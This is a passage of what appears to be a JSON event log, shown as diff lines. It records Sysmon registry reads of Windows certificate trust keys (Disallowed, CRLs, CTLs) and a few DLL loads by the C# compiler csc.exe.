"process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570859340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - 
"process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570859340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570859340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570859340000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570859340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\SysWOW64\\KernelBase.dll", - "pid": 3592, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570858869984, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570859340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570859490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570859490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570859490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, 
- "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570859490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570859490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570859490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - 
"registry_value": "Disallowed", - "timestamp": 131883570859490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570859490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570859490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570859490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570859490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570859490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570859490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { 
- "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570859490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570859490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570859490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\SysWOW64\\advapi32.dll", - "pid": 3592, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570859020000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - 
"registry_value": "Software Publishing", - "timestamp": 131883570859490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570859650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570859650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570859650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570859650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570859650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": 
"CTLs", - "timestamp": 131883570859650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570859650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570859650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570859650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570859650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570859650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570859650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": 
"Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570859650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570859650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570859650000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\SysWOW64\\msvcrt.dll", - "pid": 3592, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570859020000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570859650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570859800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570859800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570859800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": 